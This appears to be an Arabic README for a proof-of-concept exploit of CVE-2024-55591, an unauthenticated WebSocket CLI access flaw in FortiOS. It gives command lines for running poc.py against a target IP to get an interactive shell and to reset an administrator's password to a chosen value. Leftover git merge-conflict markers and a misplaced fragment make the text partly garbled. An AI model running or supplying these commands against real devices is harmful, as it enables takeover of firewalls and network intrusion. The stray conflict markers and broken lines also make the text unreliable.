
استغلال إثبات المفهوم لـ CVE-2024-55591، مما يتيح وصول CLI غير مصادق عبر WebSocket إلى أجهزة FortiOS، مع قشرة تفاعلية وإعادة تعيين كلمة مرور المسؤول.
<<<<<<< HEAD
=======
هذه أداة إثبات المفهوم (PoC) لاستغلال CVE-2024-55591، وهي ثغرة في FortiOS تسمح بالوصول غير المصادق إلى CLI عبر WebSocket.
--reset-user)python3 poc.py --host <target_ip> --port 443 --ssl
ثم استخدم الموجه:
FortiOS# get system status
FortiOS# exit
python3 poc.py --host <target_ip> --port 443 --ssl \
--reset-user Admin2 --new-pass Forti2024!
إخلاء مسؤولية: هذه الأداة مقدمة لأغراض تعليمية واختبارات مصرح بها فقط.
4fe5de8 (Add full PoC and README for CVE-2024-55591 by @cherny_zhizn)